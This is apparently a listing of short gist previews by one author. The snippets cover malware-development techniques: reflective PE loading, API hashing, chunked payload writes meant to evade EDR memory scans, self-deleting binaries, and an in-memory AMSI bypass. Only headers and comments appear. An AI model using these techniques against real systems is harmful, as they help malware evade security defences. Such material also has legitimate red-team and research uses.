This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// CRT independant printing function | |
# define print(msg, ...) \ | |
if (1) { \ | |
LPSTR Buf = (LPSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 1024); \ | |
if (Buf) { \ | |
int len = wsprintfA(Buf, msg "\n", __func__, __VA_ARGS__); \ | |
WriteConsoleA(GetStdHandle(STD_OUTPUT_HANDLE), Buf, len, 0, 0); \ | |
HeapFree(GetProcessHeap(), 0x00, Buf); \ | |
} \ | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
@brief | |
Load a PE in memory and execute it in the address space of this process | |
@author | |
wizardy0ga | |
@usage: | |
LoadPe.exe <path to exe> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#pragma once | |
#include <windows.h> | |
#include <stdio.h> | |
#define SEED_HASH 8888 | |
#define KERNEL32_HASH 0xA52DE12A | |
#define LOAD_LIBRARY_HASH 0xF4DAB6A4 | |
typedef struct _UNICODE_STRING_ | |
{ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Description: | |
Copies a payload into memory using a chunking method using NTAPI calls. This assists with breaking up memory scanning routines by EDRs. | |
A reserved / readonly page will be left at the top of the allocation. Each page below this memory page will contain the payload. | |
| Page 1 | 4096 bytes | Reserved | R | |
| Page 2 | 4096 bytes | Commited | RX | |
| Page 3 | 4096 bytes | Commited | RX | |
| Page ... | 4096 bytes | Commited | RX |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Description: | |
Copies a payload into memory using a chunking method. This assists with breaking up memory scanning routines by EDRs. | |
A reserved / readonly page will be left at the top of the allocation. Each page below this memory page will contain the payload. | |
| Page 1 | 4096 bytes | Reserved | R | |
| Page 2 | 4096 bytes | Commited | RX | |
| Page 3 | 4096 bytes | Commited | RX | |
| Page ... | 4096 bytes | Commited | RX | |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Description: | |
Program is a PoC DRM implementation. The program will only execute on the windows device that it first executed | |
on. If it's copied to another device, it will delete itself on execution. | |
A signature is kept in the rdata section of the binary. On fisrt exection, if the signature is the default signature, | |
DRM will be initialized. This process consists of hashing the BIOS's UUID, & replacing the default signature with this | |
hash. When the program executes again, it will check the BIOS's UUID hash against the signature stored in the | |
.rdata section. If the hash doesn't match, the program deletes itself. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <winternl.h> | |
#define STREAM_NAME L":XanWudS" | |
BOOL SelfDelete() | |
{ | |
HANDLE hFile = INVALID_HANDLE_VALUE; | |
PWSTR szImageName = NULL; | |
FILE_DISPOSITION_INFO DisposalInfo = { .DeleteFile = TRUE }; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include "pch.h" | |
#include <Windows.h> | |
#include <stdio.h> | |
#define RET 0xC3 | |
#define INT3 0xCC | |
#define JE 0x74 | |
#define JNE 0x75 | |
#define MOV 0xB8 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Description: | |
Bypasses AMSI by patching the functions in memory with single byte patches. Some amsi functions | |
will validate parameters & jump to a failure routine if the validation failes. By flipping this check, | |
the functions can be forced to fail which blind the anti-malware scan interface. | |
Author: | |
wizardy0ga | |
Date: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Description: | |
A simplified version of GetProcAddress. Posting here for reference later. | |
Author: | |
WizardY0ga | |
Mitre: | |
T1027.007 - Obfuscated Files or Information: Dynamic API Resolution | |
Date: | |
October 2024 |
NewerOlder